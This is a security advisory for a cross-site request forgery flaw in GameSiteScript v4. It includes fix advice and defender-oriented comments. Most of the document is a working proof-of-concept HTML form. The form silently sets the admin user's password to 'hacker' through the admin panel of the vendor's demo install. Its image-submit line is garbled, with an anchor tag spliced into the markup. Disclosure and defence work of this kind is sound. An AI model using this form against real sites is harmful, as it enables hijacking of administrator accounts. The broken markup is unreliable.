< ------------------- header data start ------------------- >
#############################################################
# Application Name : GameSiteScript v4
# Vulnerability Type : XSRF (cross-site request forgery, also written CSRF)
# Impact : The admin password can be changed remotely and automatically, using the session of an admin who is logged in at the time.
# Bug Fix Advice : A session key (session token) should be added to the form and checked by the server on submission, and the old password should be asked for before it is changed.
# author : Bug Researchers/system-hacker
############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
<!--
  Proof-of-concept form from the advisory: it POSTs a complete "edit user"
  request for user id 1 to the admin panel of the vendor's demo install.
  Every field the request carries is a fixed value chosen by the page author.
  None of them is a per-session secret, which matches the advisory's finding:
  the application has nothing in the request that distinguishes a cross-site
  submission from one made through its own admin form.

  Defender view: the fix named in the header is a per-session token embedded
  in the genuine admin form and verified on every state-changing request,
  plus a current-password check on password changes. Requests to this
  endpoint that arrive with an Origin or Referer of another site are worth
  logging and rejecting.

  NOTE(review): the typographic quotes (’) and the damaged image-input line
  near the end look like extraction/auto-link artifacts of the hosting page;
  the listing is kept exactly as published.
-->
<form action=’http://www.gamesitescript.com/40demo/admin/index.php?act=users&mthd=edituser-form&id=1’ method=’POST’ enctype=’multipart/form-data’>
<!-- Account fields are sent as hidden inputs with preset values. The email
     value appears to have been masked by the hosting site (assumption). -->
<input type=’hidden’ name=’username’ maxlength=’255’ value=’system’ /><br />
<input type=’hidden’ name=’email’ maxlength=’255’ value=’[email protected]’ /><br />
<!-- The new password is supplied directly; no field for the current password
     is sent, which is the second gap the advisory's fix advice names. -->
<input type=’hidden’ name=’password’ maxlength=’255’ value=’hacker’ /><br />
<!-- Both options carry the value Yes, so isadmin is sent as Yes whichever
     option is selected. -->
<select name=’isadmin’>
<option value=’Yes’>Yes - No Change</option>
<option value=’Yes’>Yes</option></select>
<!-- Routing fields: id and act repeat the values in the action URL's query
     string; mthd is edituser-do here, while the URL carries edituser-form. -->
<input type=’hidden’ name=’id’ value=’1’ />
<input type=’hidden’ name=’act’ value=’users’ />
<input type=’hidden’ name=’mthd’ value=’edituser-do’ />
<!-- Image submit control; in this copy an anchor tag has been spliced into
     the src attribute, so the line is not valid markup as shown. -->
<input type=’image’ class=submit value=’Submit’ src= a target=_blank href=http://www.gamesitescript.com/40demo/plugins/site/themes/admin/submit.gif>http://www.gamesitescript.com/40demo/plugins/site/themes/admin/submit.gif />
</form>
< -- bug code end of -- >